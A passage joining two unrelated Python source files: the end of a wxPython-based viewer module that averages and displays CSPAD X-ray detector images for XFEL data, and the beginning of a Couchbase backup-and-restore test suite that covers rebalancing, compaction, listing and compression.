* Radial distribution plot, requested by Jan F. Kern
* Coordinate and resolution tool-tips in sub-pixel zoom. Can we
choose the colour automagically?
"""
from __future__ import division
__version__ = "$Revision$"
import multiprocessing
import thread
import threading
import time
from dxtbx.format.FormatPYunspecified import FormatPYunspecified
from iotbx.detectors.npy import NpyImage
from rstbx.viewer.frame import XrayFrame
from xfel.cxi.cspad_ana import common_mode, cspad_tbx
from xfel.cxi.cspad_ana import skip_event_flag
class _ImgDict(NpyImage):
"""Minimal iotbx detector class for in-memory dictionary
representation of NpyImage images. This class must be defined at
the top level of the module so that it can be pickled.
"""
def __init__(self, data, parameters):
# self.vendortype is required to guess the beam centre convention.
super(_ImgDict, self).__init__('')
self.parameters = parameters
self.vendortype = 'npy_raw'
self.bin_safe_set_data(data)
def readHeader(self):
pass
def read(self):
pass
class _Format(FormatPYunspecified):
"""Minimal Format class for in-memory dxtbx representation of
FormatPYunspecified images. This class must be defined at the top
level of the module so that it can be pickled.
"""
def __init__(self, **kwargs):
"""The _Format constructor builds a dxtbx Format instance from the
supplied keyworded arguments. It should be equivalent to the
FormatPYunspecified constructor.
"""
from copy import deepcopy
from dxtbx.model.beam import Beam, BeamFactory
from dxtbx.model.detector import Detector, DetectorFactory
from dxtbx.model.goniometer import Goniometer, GoniometerFactory
from dxtbx.model import Scan, ScanFactory
from spotfinder.applications.xfel import cxi_phil
from iotbx.detectors.cspad_detector_formats import detector_format_version
# From Format.__init__().
self._goniometer_factory = GoniometerFactory
self._detector_factory = DetectorFactory
self._beam_factory = BeamFactory
self._scan_factory = ScanFactory
# From FormatPYunspecified._start(). Split the keyworded
# arguments into a parameter dictionary suitable for
# iotbx.detectors.npy.NpyImage and a separate image data object.
parameters = dict(
BEAM_CENTER_X=kwargs['PIXEL_SIZE'] * kwargs['BEAM_CENTER'][0],
BEAM_CENTER_Y=kwargs['PIXEL_SIZE'] * kwargs['BEAM_CENTER'][1],
CCD_IMAGE_SATURATION=kwargs['SATURATED_VALUE'],
DISTANCE=kwargs['DISTANCE'],
OSC_RANGE=0,
OSC_START=0,
PIXEL_SIZE=kwargs['PIXEL_SIZE'],
SATURATED_VALUE=kwargs['SATURATED_VALUE'],
SIZE1=kwargs['DATA'].focus()[0],
SIZE2=kwargs['DATA'].focus()[1],
WAVELENGTH=kwargs['WAVELENGTH'])
self.detectorbase = _ImgDict(kwargs['DATA'], parameters)
# Attempt to apply tile translations only for detectors that
# support it.
version_lookup = detector_format_version(
kwargs['DETECTOR_ADDRESS'],
kwargs['TIME_TUPLE'][0])
if version_lookup is not None:
params = cxi_phil.cxi_versioned_extract(
"distl.detector_format_version=" + version_lookup)
# Necessary to keep the phil parameters for subsequent calls to
# get_tile_manager().
horizons_phil = params.persist.commands
self.detectorbase.translate_tiles(horizons_phil)
self.detectorbase.horizons_phil_cache = deepcopy(horizons_phil)
# From Format.setup().
goniometer_instance = self._goniometer()
assert(isinstance(goniometer_instance, Goniometer))
self._goniometer_instance = goniometer_instance
detector_instance = self._detector()
assert(isinstance(detector_instance, Detector))
self._detector_instance = detector_instance
beam_instance = self._beam()
assert(isinstance(beam_instance, Beam))
self._beam_instance = beam_instance
scan_instance = self._scan()
assert(isinstance(scan_instance, Scan))
self._scan_instance = scan_instance
class _XrayFrameThread(threading.Thread):
"""The _XrayFrameThread class allows MainLoop() to be run as a
thread, which is necessary because all calls to wxPython must be
made from the same thread that originally imported wxPython.
This is all based on "Running MainLoop in a separate thread",
http://wiki.wxpython.org/MainLoopAsThread.
"""
def __init__(self):
"""The thread is started automatically on initialisation.
self.run() will initialise self.frame and release self._init_lock.
"""
super(_XrayFrameThread, self).__init__()
self.setDaemon(1)
self._init_lock = threading.Lock()
self._next_semaphore = threading.Semaphore()
self._start_orig = self.start
self._frame = None
self.start = self._start_local
self._init_lock.acquire()
self.start()
def _start_local(self):
"""The _start_local() function calls the run() function through
self._start_orig, and exists only after self._init_lock has been
released. This eliminates a race condition which could cause
updates to be sent to a non-existent frame.
"""
self._start_orig()
self._init_lock.acquire()
def run(self):
"""The run() function defines the frame and starts the main loop.
self._init_lock is released only when all initialisation is done.
Whatever thread is the current one when wxWindows is initialised
is what it will consider the "main thread." For wxPython 2.4 that
happens when wxPython.wx is imported the first time. For 2.5 it
will be when the wx.App object is created.
"""
import wx
from wxtbx import bitmaps
app = wx.App(0)
self._bitmap_pause = bitmaps.fetch_icon_bitmap('actions', 'stop')
self._bitmap_run = bitmaps.fetch_icon_bitmap('actions', 'runit')
self._frame = XrayFrame(None, -1, "X-ray image display", size=(800, 720))
self._frame.Bind(wx.EVT_IDLE, self.OnIdle)
self.setup_toolbar(self._frame.toolbar)
self._frame.Show()
self._init_lock.release()
app.MainLoop()
# Avoid deadlock where the send_data() function is waiting for the
# semaphore after the frame has closed.
self._next_semaphore.release()
def send_data(self, img, title):
"""The send_data() function updates the wxPython application with
@p img and @p title by sending it an ExternalUpdateEvent(). The
function blocks until the event is processed."""
from rstbx.viewer.frame import ExternalUpdateEvent
event = ExternalUpdateEvent()
event.img = img
event.title = title
if self.isAlive():
try:
# Saturating the event queue makes the whole caboodle
# uselessly unresponsive. Therefore, block until idle events
# are processed.
while self.isAlive() and not self._run_pause.IsToggled():
pass
self._frame.AddPendingEvent(event)
self._is_idle = False
while self.isAlive() and not self._is_idle:
pass
except Exception:
pass
def setup_toolbar(self, toolbar):
import wx
from wxtbx import icons
toolbar.ClearTools()
btn = toolbar.AddLabelTool(
id=wx.ID_ANY,
label="Settings",
bitmap=icons.advancedsettings.GetBitmap(),
shortHelp="Settings",
kind=wx.ITEM_NORMAL)
self._frame.Bind(wx.EVT_MENU, self._frame.OnShowSettings, btn)
btn = toolbar.AddLabelTool(
id=wx.ID_ANY,
label="Zoom",
bitmap=icons.search.GetBitmap(),
shortHelp="Zoom",
kind=wx.ITEM_NORMAL)
self._frame.Bind(wx.EVT_MENU, self._frame.OnZoom, btn)
# Reset the normal bitmap after the tool has been created, so that
# it will update on the next event. See also OnPauseRun()
self._run_pause = toolbar.AddCheckLabelTool(
id=wx.ID_ANY,
label="Run/Pause",
bitmap=self._bitmap_run,
shortHelp="Run/Pause")
self._run_pause.SetNormalBitmap(self._bitmap_pause)
self._frame.Bind(wx.EVT_MENU, self.OnPauseRun, self._run_pause)
def OnIdle(self, event):
self._is_idle = True
event.RequestMore()
def OnPauseRun(self, event):
if self._run_pause.IsToggled():
self._run_pause.SetNormalBitmap(self._bitmap_run)
else:
self._run_pause.SetNormalBitmap(self._bitmap_pause)
def stop(self):
from wx import CloseEvent
self._frame.AddPendingEvent(CloseEvent())
def _xray_frame_process(queue, linger=True, wait=None):
"""The _xray_frame_process() function starts the viewer in a
separate thread. It then continuously reads data from @p queue and
dispatches update events to the viewer. The function returns when
it reads a @c None object from @p queue or when the viewer thread
has exited.
"""
from Queue import Empty
import rstbx.viewer
# Start the viewer's main loop in its own thread, and get the
# interface for sending updates to the frame.
thread = _XrayFrameThread()
send_data = thread.send_data
while True:
try:
payload = queue.get(timeout=1)
if payload is None:
if linger:
thread.join()
else:
thread.stop()
return
if not thread.isAlive():
thread.join()
return
if wait is not None:
time.sleep(wait)
# All kinds of exceptions--not just PyDeadObjectError--may occur
# if the viewer process exits during this call. XXX This may be
# dangerous!
try:
send_data(rstbx.viewer.image(payload[0]), payload[1])
except Exception:
pass
except Empty:
pass
class mod_view(common_mode.common_mode_correction):
"""XXX
"""
def __init__(self,
address,
n_collate = None,
n_update = 120,
common_mode_correction = "none",
wait=None,
photon_counting=False,
sigma_scaling=False,
**kwds):
"""The mod_view class constructor XXX.
@param address Full data source address of the DAQ device
@param calib_dir Directory with calibration information
@param common_mode_correction The type of common mode correction to apply
@param dark_path Path to input average dark image
@param dark_stddev Path to input standard deviation dark
image, required if @p dark_path is given
@param wait Minimum time (in seconds) to wait on the current
image before moving on to the next
@param n_collate Number of shots to average, or <= 0 to
average all shots
@param n_update Number of shots between updates
"""
super(mod_view, self).__init__(
address=address,
common_mode_correction=common_mode_correction,
**kwds)
self.detector = cspad_tbx.address_split(address)[0]
self.nvalid = 0
self.ncollate = cspad_tbx.getOptInteger(n_collate)
self.nupdate = cspad_tbx.getOptInteger(n_update)
self.photon_counting = cspad_tbx.getOptBool(photon_counting)
self.sigma_scaling = cspad_tbx.getOptBool(sigma_scaling)
if (self.ncollate is None):
self.ncollate = self.nupdate
if (self.ncollate > self.nupdate):
self.ncollate = self.nupdate
self.logger.warning("n_collate capped to %d" % self.nupdate)
linger = True # XXX Make configurable
wait = cspad_tbx.getOptFloat(wait)
# Create a managed FIFO queue shared between the viewer and the
# current process. The current process will produce images, while
# the viewer process will consume them.
manager = multiprocessing.Manager()
self._queue = manager.Queue()
self._proc = multiprocessing.Process(
target=_xray_frame_process, args=(self._queue, linger, wait))
self._proc.start()
self.n_shots = 0
def event(self, evt, env):
"""The event() function is called for every L1Accept transition.
XXX Since the viewer is now running in a parallel process, the
averaging here is now the bottleneck.
@param evt Event data object, a configure object
@param env Environment object
"""
from pyana.event import Event
self.n_shots += 1
super(mod_view, self).event(evt, env)
if evt.status() != Event.Normal or evt.get('skip_event'): # XXX transition
return
# Get the distance for the detectors that should have it, and set
# it to NaN for those that should not.
if self.detector == 'CxiDs1' or \
self.detector == 'CxiDsd' or \
self.detector == 'XppGon':
distance = cspad_tbx.env_distance(self.address, env, self._detz_offset)
if distance is None:
self.nfail += 1
self.logger.warning("event(): no distance, shot skipped")
evt.put(skip_event_flag(), "skip_event")
return
else:
distance = float('nan')
if not self._proc.is_alive():
evt.setStatus(Event.Stop)
# Early return if the next update to the viewer is more than
# self.ncollate shots away. XXX Since the common_mode.event()
# function does quite a bit of processing, the savings are
# probably not so big.
next_update = (self.nupdate - 1) - (self.nshots - 1) % self.nupdate
if (self.ncollate > 0 and next_update >= self.ncollate):
return
if self.sigma_scaling:
self.do_sigma_scaling()
if self.photon_counting:
self.do_photon_counting()
# Trim the disabled section from the Sc1 detector image. XXX This
# is a bit of a kludge, really.
# if (self.address == "CxiSc1-0|Cspad2x2-0"):
# self.cspad_img = self.cspad_img[185:2 * 185, :]
# Update the sum of the valid images, starting a new collation if
# appropriate. This guarantees self.nvalid > 0.
if (self.nvalid == 0 or self.ncollate > 0 and self.nvalid >= self.ncollate):
self.img_sum = self.cspad_img
self.nvalid = 1
else:
self.img_sum += self.cspad_img
self.nvalid += 1
# Update the viewer to display the current average image, and
# start a new collation, if appropriate.
if (next_update == 0):
from time import localtime, strftime
time_str = strftime("%H:%M:%S", localtime(evt.getTime().seconds()))
title = "r%04d@%s: average of %d last images on %s" \
% (evt.run(), time_str, self.nvalid, self.address)
# See also mod_average.py.
device = cspad_tbx.address_split(self.address)[2]
if device == 'Cspad':
beam_center = self.beam_center
pixel_size = cspad_tbx.pixel_size
saturated_value = cspad_tbx.cspad_saturated_value
elif device == 'marccd':
beam_center = tuple(t // 2 for t in self.img_sum.focus())
pixel_size = 0.079346
saturated_value = 2**16 - 1
# Wait for the viewer process to empty the queue before feeding
# it a new image, and ensure not to hang if the viewer process
# exits. Because of multithreading/multiprocessing semantics,
# self._queue.empty() is unreliable.
fmt = _Format(BEAM_CENTER=beam_center,
DATA=self.img_sum / self.nvalid,
DETECTOR_ADDRESS=self.address,
DISTANCE=distance,
PIXEL_SIZE=pixel_size,
SATURATED_VALUE=saturated_value,
TIME_TUPLE=cspad_tbx.evt_time(evt),
WAVELENGTH=self.wavelength)
while not self._queue.empty():
if not self._proc.is_alive():
evt.setStatus(Event.Stop)
return
while True:
try:
self._queue.put((fmt, title), timeout=1)
break
except Exception:
pass
if (self.ncollate > 0):
self.nvalid = 0
#signature for pyana:
#def endjob(self, env):
#signature for psana:
#def endjob(self, evt, env):
def endjob(self, obj1, obj2=None):
"""The endjob() function terminates the viewer process by sending
it a @c None object, and waiting for it to finish.
@param evt Event object (psana only)
@param env Environment object
"""
if obj2 is None:
env = obj1
else:
evt = obj1
env = obj2
super(mod_view, self).endjob(env)
try:
self._queue.put(None)
except Exception:
pass
self.logger.info("endjob(): end of stream")
self._proc.join()
|
enterprise_backup_restore_test.py
|
import re
import copy
import json
from random import randrange, randint
from threading import Thread
from Cb_constants import constants
from couchbase_helper.cluster import Cluster
from membase.helper.rebalance_helper import RebalanceHelper
from couchbase_helper.documentgenerator import BlobGenerator, DocumentGenerator
from ent_backup_restore.enterprise_backup_restore_base import EnterpriseBackupRestoreBase
from membase.api.rest_client import RestConnection, RestHelper
from BucketLib.bucket import Bucket
from membase.helper.bucket_helper import BucketOperationHelper
from pytests.query_tests_helper import QueryHelperTests
from remote.remote_util import RemoteUtilHelper, RemoteMachineShellConnection
from security.auditmain import audit
from security.rbac_base import RbacBase
from upgrade.newupgradebasetest import NewUpgradeBaseTest
from couchbase.bucket import Bucket
from couchbase_helper.document import View
from eventing.eventing_base import EventingBaseTest
from tasks.future import TimeoutError
from xdcr.xdcrnewbasetests import NodeHelper
from couchbase_helper.stats_tools import StatsCommon
from testconstants import COUCHBASE_DATA_PATH, WIN_COUCHBASE_DATA_PATH, \
COUCHBASE_FROM_4DOT6, ENT_BKRS, ENT_BKRS_FTS
AUDITBACKUPID = 20480
AUDITRESTOREID = 20485
SOURCE_CB_PARAMS = {
"authUser": "default",
"authPassword": "",
"authSaslUser": "",
"authSaslPassword": "",
"clusterManagerBackoffFactor": 0,
"clusterManagerSleepInitMS": 0,
"clusterManagerSleepMaxMS": 20000,
"dataManagerBackoffFactor": 0,
"dataManagerSleepInitMS": 0,
"dataManagerSleepMaxMS": 20000,
"feedBufferSizeBytes": 0,
"feedBufferAckThreshold": 0
}
INDEX_DEFINITION = {
"type": "fulltext-index",
"name": "",
"uuid": "",
"params": {},
"sourceType": "couchbase",
"sourceName": "default",
"sourceUUID": "",
"sourceParams": SOURCE_CB_PARAMS,
"planParams": {}
}
class EnterpriseBackupRestoreTest(EnterpriseBackupRestoreBase, NewUpgradeBaseTest, EventingBaseTest):
def setUp(self):
super(EnterpriseBackupRestoreTest, self).setUp()
self.users_check_restore = \
self.input.param("users-check-restore", '').replace("ALL", "*").split(";")
if '' in self.users_check_restore:
self.users_check_restore.remove('')
for server in [self.backupset.backup_host, self.backupset.restore_cluster_host]:
conn = RemoteMachineShellConnection(server)
conn.extract_remote_info()
conn.terminate_processes(conn.info, ["cbbackupmgr"])
conn.disconnect()
self.bucket_helper = BucketOperationHelper()
def tearDown(self):
super(EnterpriseBackupRestoreTest, self).tearDown()
def test_backup_create(self):
self.backup_create_validate()
def test_backup_restore_sanity(self):
"""
1. Create default bucket on the cluster and loads it with given number of items
2. Perform updates and create backups for specified number of times (test param number_of_backups)
3. Perform restores for the same number of times with random start and end values
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self.log.info("*** start to load items to all buckets")
self._load_all_buckets(self.master, gen, "create", self.expires)
self.log.info("*** done to load items to all buckets")
self.ops_type = self.input.param("ops-type", "update")
self.expected_error = self.input.param("expected_error", None)
if self.auto_failover:
self.log.info("Enabling auto failover on " + str(self.backupset.cluster_host))
rest_conn = RestConnection(self.backupset.cluster_host)
rest_conn.update_autofailover_settings(self.auto_failover, self.auto_failover_timeout)
self.backup_create_validate()
for i in range(1, self.backupset.number_of_backups + 1):
if self.ops_type == "update":
self.log.info("*** start to update items in all buckets")
self._load_all_buckets(self.master, gen, "update", self.expires)
self.log.info("*** done update items in all buckets")
elif self.ops_type == "delete":
self.log.info("*** start to delete items in all buckets")
self._load_all_buckets(self.master, gen, "delete", self.expires)
self.log.info("*** done to delete items in all buckets")
self.sleep(10)
self.log.info("*** start to validate backup cluster")
self.backup_cluster_validate()
self.targetMaster = True
start = randrange(1, self.backupset.number_of_backups + 1)
if start == self.backupset.number_of_backups:
end = start
else:
end = randrange(start, self.backupset.number_of_backups + 1)
self.log.info("*** start to restore cluster")
restored = {"{0}/{1}".format(start, end): ""}
for i in range(1, self.backupset.number_of_backups + 1):
if self.reset_restore_cluster:
self.log.info("*** start to reset cluster")
self.backup_reset_clusters(self.cluster_to_restore)
if self.same_cluster:
self._initialize_nodes(Cluster(), self.servers[:self.nodes_init])
else:
self._initialize_nodes(Cluster(), self.input.clusters[0][:self.nodes_init])
self.log.info("Done reset cluster")
self.sleep(10)
""" Add built-in user cbadminbucket to second cluster """
self.add_built_in_server_user(node=self.input.clusters[0][:self.nodes_init][0])
self.backupset.start = start
self.backupset.end = end
self.log.info("*** start restore validation")
self.backup_restore_validate(compare_uuid=False,
seqno_compare_function=">=",
expected_error=self.expected_error)
if self.backupset.number_of_backups == 1:
continue
while "{0}/{1}".format(start, end) in restored:
start = randrange(1, self.backupset.number_of_backups + 1)
if start == self.backupset.number_of_backups:
end = start
else:
end = randrange(start, self.backupset.number_of_backups + 1)
restored["{0}/{1}".format(start, end)] = ""
def test_backup_restore_after_rebalance(self):
"""
1. Create default bucket on the cluster and loads it with given number of items
2. Does a rebalance on cluster to be backed up with specified number of servers in (test param nodes_in) and
servers out (test param nodes_out)
3. Takes a backup
4. Does a rebalance on cluster to be restored to with specified number of servers in (test param nodes_in) and
servers out (test param nodes_out)
5. Performs a restore on the restore cluster
"""
serv_in = self.servers[self.nodes_init:self.nodes_init + self.nodes_in]
serv_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create_validate()
self.backupset.number_of_backups = 1
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, serv_in, serv_out)
rebalance.result()
self.backup_cluster_validate()
if not self.same_cluster:
self._initialize_nodes(Cluster(), self.input.clusters[0][:self.nodes_init])
serv_in = self.input.clusters[0][self.nodes_init: self.nodes_init + self.nodes_in]
serv_out = self.input.clusters[0][self.nodes_init - self.nodes_out: self.nodes_init]
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, serv_in, serv_out)
else:
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, serv_out, serv_in)
rebalance.result()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function="<=")
def test_backup_restore_with_rebalance(self):
"""
1. Create default bucket on the cluster and loads it with given number of items
2. Does a rebalance on cluster to be backed up with specified number of servers in (test param nodes_in) and
servers out (test param nodes_out)
3. Takes a backup while rebalance is going on
4. Does a rebalance on cluster to be restored to with specified number of servers in (test param nodes_in) and
servers out (test param nodes_out)
5. Performs a restore on the restore cluster while rebalance is going on
"""
serv_in = self.servers[self.nodes_init:self.nodes_init + self.nodes_in]
serv_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create_validate()
self.backupset.number_of_backups = 1
self.cluster.async_rebalance(self.cluster_to_backup, serv_in, serv_out)
self.sleep(10)
self.backup_cluster_validate()
if not self.same_cluster:
self._initialize_nodes(Cluster(), self.input.clusters[0][:self.nodes_init])
serv_in = self.input.clusters[0][self.nodes_init: self.nodes_init + self.nodes_in]
serv_out = self.input.clusters[0][self.nodes_init - self.nodes_out: self.nodes_init]
self.cluster.async_rebalance(self.cluster_to_restore, serv_in, serv_out)
else:
self.cluster.async_rebalance(self.cluster_to_restore, serv_out, serv_in)
self.sleep(10)
self.backup_restore_validate(compare_uuid=False, seqno_compare_function="<=")
def test_backup_restore_with_ops(self):
"""
1. Create default bucket on the cluster and loads it with given number of items
2. Perform the specified ops (test param ops-type) and create backups for specified number of times
(test param number_of_backups)
3. Perform restores for the same number of times with random start and end values
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
initial_gen = copy.deepcopy(gen)
initial_keys = []
for x in initial_gen:
initial_keys.append(x[0])
self.log.info("Start to load items to all buckets")
self._load_all_buckets(self.master, gen, "create", 0)
self.ops_type = self.input.param("ops-type", "update")
self.log.info("Create backup repo ")
self.backup_create()
for i in range(1, self.backupset.number_of_backups + 1):
self._backup_restore_with_ops()
start = randrange(1, self.backupset.number_of_backups + 1)
if start == self.backupset.number_of_backups:
end = start
else:
end = randrange(start, self.backupset.number_of_backups + 1)
if self.compact_backup and self.ops_type == "delete":
self.log.info("Start to compact backup ")
self.backup_compact_validate()
self.log.info("Validate deleted keys")
self.backup_compact_deleted_keys_validation(initial_keys)
self.log.info("start restore cluster ")
restored = {"{0}/{1}".format(start, end): ""}
for i in range(1, self.backupset.number_of_backups + 1):
self.backupset.start = start
self.backupset.end = end
self._backup_restore_with_ops(backup=False, compare_function=">=")
if self.backupset.number_of_backups == 1:
continue
while "{0}/{1}".format(start, end) in restored:
start = randrange(1, self.backupset.number_of_backups + 1)
if start == self.backupset.number_of_backups:
end = start
else:
end = randrange(start, self.backupset.number_of_backups + 1)
restored["{0}/{1}".format(start, end)] = ""
def _backup_restore_with_ops(self, exp=0, backup=True, compare_uuid=False,
compare_function="==", replicas=False,
mode="memory", node=None, repeats=0,
validate_directory_structure=True):
self.ops_type = self.input.param("ops-type", "update")
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self.log.info("Start doing ops: %s " % self.ops_type)
if node is None:
node = self.master
self._load_all_buckets(node, gen, self.ops_type, exp)
if backup:
self.backup_cluster_validate(repeats=repeats,
validate_directory_structure=validate_directory_structure)
else:
self.backup_restore_validate(compare_uuid=compare_uuid,
seqno_compare_function=compare_function,
replicas=replicas, mode=mode)
def test_backup_list(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backup and validates it
3. Executes list command on the backupset and validates the output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self.backup_list_validate()
def test_backup_list_optional_switches(self):
"""
1. Creates specified buckets on the cluster and loads it with given number of items
Note: this test should be run with 2 buckets
2. Creates two backupsets
3. Creates two backups on each of the backupset
4. Executes list command with --name and validates
5. Executes list command with --name and --incr-backup and validates
6. Executes list command with --name, --incr-backup and --bucket-backup and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=2)
self.backupset.name = "backup2"
self.backup_create(del_old_backup=False)
self._take_n_backups(n=2)
incr_names = 0
backup_name = False
self.backupset.backup_list_name = "backup"
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if self.backupset.backup_list_name in line:
backup_name = True
if self.backups[0] in line:
incr_names += 1
if self.backups[1] in line:
incr_names += 1
self.assertTrue(backup_name, "Expected backup name not found in output")
self.log.info("Expected backup name found in output")
self.assertEqual(incr_names, 2, "Expected backups were not listed for --name option")
self.log.info("Expected backups listed for --name option")
incr_names = 0
backup_name = False
self.backupset.backup_list_name = "backup2"
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if self.backupset.backup_list_name in line:
backup_name = True
if self.backups[2] in line:
incr_names += 1
if self.backups[3] in line:
incr_names += 1
self.assertTrue(backup_name, "Expected backup name not found in output")
self.log.info("Expected backup name found in output")
self.assertEqual(incr_names, 2, "Expected backups were not listed for --name option")
self.log.info("Expected backups listed for --name option")
buckets = 0
name = False
self.backupset.backup_list_name = "backup"
self.backupset.backup_incr_backup = self.backups[0]
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if self.backupset.backup_incr_backup in line:
name = True
if self.buckets[0].name in line:
buckets += 1
if self.buckets[1].name in line:
buckets += 1
self.assertTrue(name, "Expected incremental backup name not found in output")
self.log.info("Expected incrmental backup name found in output")
self.assertEqual(buckets, 2, "Expected buckets were not listed for --incr-backup option")
self.log.info("Expected buckets were listed for --incr-backup option")
name = False
items = 0
self.backupset.backup_list_name = "backup2"
self.backupset.backup_incr_backup = self.backups[2]
self.backupset.bucket_backup = self.buckets[0].name
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if self.buckets[0].name in line:
name = True
if "shard" in line:
split = line.split(" ")
split = [s for s in split if s]
items += int(split[1])
self.assertTrue(name, "Expected bucket not listed for --bucket-backup option")
self.log.info("Expected bucket listed for --bucket-backup option")
self.assertEqual(items, self.num_items, "Mismatch in items for --bucket-backup option")
self.log.info("Expected number of items for --bucket-backup option")
def test_list_with_large_number_of_backups(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a large number of backups
3. Executes list command on the backupset and validates the output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=25)
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_count = 0
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line).group()
if backup_name in self.backups:
backup_count += 1
self.log.info("{0} matched in list command output".format(backup_name))
self.assertEqual(backup_count, len(self.backups), "Number of backups did not match")
self.log.info("Number of backups matched")
def _take_n_backups(self, n=1, validate=False):
for i in range(1, n + 1):
if validate:
self.backup_cluster_validate()
else:
self.backup_cluster()
def test_backup_compact(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backup and validates it
3. Executes compact command on the backupset and validates the output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self.backup_compact_validate()
def test_backup_with_purge_interval_set_to_float(self):
"""
cbbackupmgr should handle case with purge interval set to float number
return: None
"""
purgeInterval = 1.5
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self.log.info("Set purge interval to float value '%s'" % purgeInterval)
rest = RestConnection(self.backupset.cluster_host)
status, content = rest.set_purge_interval_and_parallel_compaction(purgeInterval)
if status:
self.log.info("Done set purge interval value '%s'" % purgeInterval)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate()
else:
self.fail("Failed to set purgeInterval value")
def test_restore_from_compacted_backup(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backup and validates it
3. Executes compact command on the backupset
4. Restores from the compacted backup and validates it
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self.backup_compact()
self.backup_restore_validate()
def test_backup_with_compress_flag(self):
"""
1. Load docs into bucket
2. Backup without compress flag
3. Get backup data size
4. Delete backup repo
5. Do backup again with compress flag
6. Compare those data if it flag works
:return: None
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backupset.backup_compressed = False
self.backup_cluster()
no_compression = self.get_database_file_info()
self.log.info("\nDelete old backup and do backup again with compress flag")
self.backup_create()
self.backupset.backup_compressed = self.input.param("backup-compressed", False)
self.backup_cluster()
with_compression = self.get_database_file_info()
self.validate_backup_compressed_file(no_compression, with_compression)
def test_backup_restore_with_credentials_env(self):
"""
password will pass as in env variable
:return: None
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
output, error = self.backup_cluster()
if output and not self._check_output("Backup successfully completed", output):
self.fail("Failed to run with password env %s " % output)
self.backup_cluster_validate(skip_backup=True)
self.backup_list()
self.backup_restore_validate()
def test_backup_with_update_on_disk_of_snapshot_markers(self):
"""
This test is for MB-25727 (using cbbackupwrapper)
Check when cbwrapper will be dropped to remove this test.
No default bucket, default_bucket=false
Create bucket0
Load 100K items to bucket0
Stop persistence on server via cbepctl
Load another 100K items.
Run full backup with cbbackupwrapper
Load another 100K items.
Run diff backup. Backup process will hang with error in memcached as shown above
:return: None
"""
gen1 = BlobGenerator("ent-backup1", "ent-backup-", self.value_size, end=100000)
gen2 = BlobGenerator("ent-backup2", "ent-backup-", self.value_size, end=100000)
gen3 = BlobGenerator("ent-backup3", "ent-backup-", self.value_size, end=100000)
rest_conn = RestConnection(self.backupset.cluster_host)
rest_conn.create_bucket(bucket="bucket0", ramQuotaMB=1024)
self.buckets = rest_conn.get_buckets()
authentication = "-u Administrator -p password"
self._load_all_buckets(self.master, gen1, "create", 0)
self.log.info("Stop persistent")
cluster_nodes = rest_conn.get_nodes()
clusters = copy.deepcopy(cluster_nodes)
shell = RemoteMachineShellConnection(self.backupset.backup_host)
for node in clusters:
shell.execute_command("%scbepctl%s %s:%s -b %s stop %s" % \
(self.cli_command_location,
self.cmd_ext,
node.ip,
constants.memcached_port,
"bucket0",
authentication))
shell.disconnect()
self.log.info("Load 2nd batch docs")
self._load_all_buckets(self.master, gen2, "create", 0)
self.log.info("Run full backup with cbbackupwrapper")
shell = RemoteMachineShellConnection(self.backupset.backup_host)
backup_dir = self.tmp_path + "backup" + self.master.ip
shell.execute_command("rm -rf %s" % backup_dir)
shell.execute_command("mkdir %s" % backup_dir)
shell.execute_command("cd %s;./cbbackupwrapper%s http://%s:8091 %s -m full %s"
% (self.cli_command_location, self.cmd_ext,
self.backupset.cluster_host.ip,
backup_dir,
authentication))
self.log.info("Load 3rd batch docs")
self._load_all_buckets(self.master, gen3, "create", 0)
self.log.info("Run diff backup with cbbackupwrapper")
output, _ = shell.execute_command("cd %s;./cbbackupwrapper%s http://%s:8091 %s -m diff %s"
% (self.cli_command_location, self.cmd_ext,
self.backupset.cluster_host.ip,
backup_dir,
authentication))
if output and "SUCCESSFULLY COMPLETED" not in output[1]:
